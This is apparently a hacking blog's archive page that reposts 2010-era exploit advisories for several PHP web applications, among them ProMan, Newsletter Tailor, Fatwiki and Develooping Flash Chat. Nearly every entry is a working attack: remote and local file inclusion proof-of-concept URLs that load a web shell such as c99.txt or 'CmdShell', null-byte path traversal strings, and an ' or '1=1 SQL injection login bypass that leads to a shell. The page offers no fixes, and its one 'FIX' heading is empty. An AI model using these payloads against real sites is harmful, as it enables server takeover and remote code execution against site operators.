From A-Z and 0-9


ProMan <= 0.1.1 Multiple File Include Vulnerability
February 28, 2010, 2:37 am
Filed under: Hack | Tags: , , , , , , , , , , , ,

[RFI Code]
<?php
if (!($_GET['page']))
include('info.php');
else
include $_GET['page'].'.php';
?>
[LFI Code]
include_once('lang/'.$_SESSION['userLang'].'/elisttasks.php');
if (!defined('PROMAN'))
pexit ($l['no hack']);
##############################################################
PoC RFI:
[phpRAINCHECK_path]/_center.php?page=[Shell]
##############################################################
PoC LFI:
[phpRAINCHECK_path]/elisttasks.php?_SESSION[userLang]=[LFI%00]
[phpRAINCHECK_path]/managepmanagers.php?_SESSION[userLang]=[LFI%00]
[phpRAINCHECK_path]/manageusers.php?_SESSION[userLang]=[LFI%00]
[phpRAINCHECK_path]/helpfunc.php?_SESSION[userLang]=[LFI%00]
[phpRAINCHECK_path]/managegroups.php?_SESSION[userLang]=[LFI%00]
[phpRAINCHECK_path]/manageprocess.php?_SESSION[userLang]=[LFI%00]
[phpRAINCHECK_path]/manageusersgroups.php?_SESSION[userLang]=[LFI%00]

others...

Comments Off


Newsletter Tailor Remote File Include Vulnerability
February 10, 2010, 3:37 pm
Filed under: Hack | Tags: , , , , , , , , , , ,

===[ Exploit ]=== include($p.".php");
[»] http://server/list/admin/index.php?p=http://localhost/c99.txt?
[»]Note: When you update the page prompts you to log on
[»](Auth Bypass) SQL Injection :user:' or '1=1  pass:' or '1=1
Then be accessed on the "sh3ll"

Comments Off


Fatwiki (fwiki) Remote FiLe include RFI
February 2, 2010, 2:10 pm
Filed under: Hack | Tags: , , , , , , , , , , ,

[ Vulnerable File ]
/datumscalc.php?kal_class_path=[INDONESIANCODER]
/monatsblatt.php?kal_class_path=[INDONESIANCODER]
[ BUG ]
[!] datumscalc.php
- require_once("$kal_class_path/kalender.class.php");
- require_once("$kal_class_path/feiertage.class.php");
- require_once("$kal_class_path/sonnemond.class.php");
[!] monatsblatt.php
- require_once("$kal_class_path/kalender.class.php");
- require_once("$kal_class_path/feiertage.class.php");
- require_once("$kal_class_path/sonnemond.class.php");
- require_once("$kal_class_path/minikal.php");
[ FIX ]


Comments Off


phpPollScript <= 1.3 Remote File Include Vulnerability
January 16, 2010, 6:41 am
Filed under: Hack | Tags: , , , , , , , , , , ,

/php/init.poll.php?include_class=

Comments Off


phpAutoMembersArea 3.2.5 ($installed_config_file) Remote File Inclusion
January 16, 2010, 5:41 am
Filed under: Hack | Tags: , , , , , , , , , , ,

+ PoC:

+ http://[target]/auto_check_renewals.php?installed_config_file=

Comments Off


Develooping Flash Chat (banned_file) Remote File Inclusion
January 16, 2010, 5:39 am
Filed under: Hack | Tags: , , , , , , , , , , ,

Remote File Include :

http://www.target.com/path/chat/adminips.php?banned_file=CmdShell

Comments Off

« Older Posts


Follow

Get every new post delivered to your Inbox.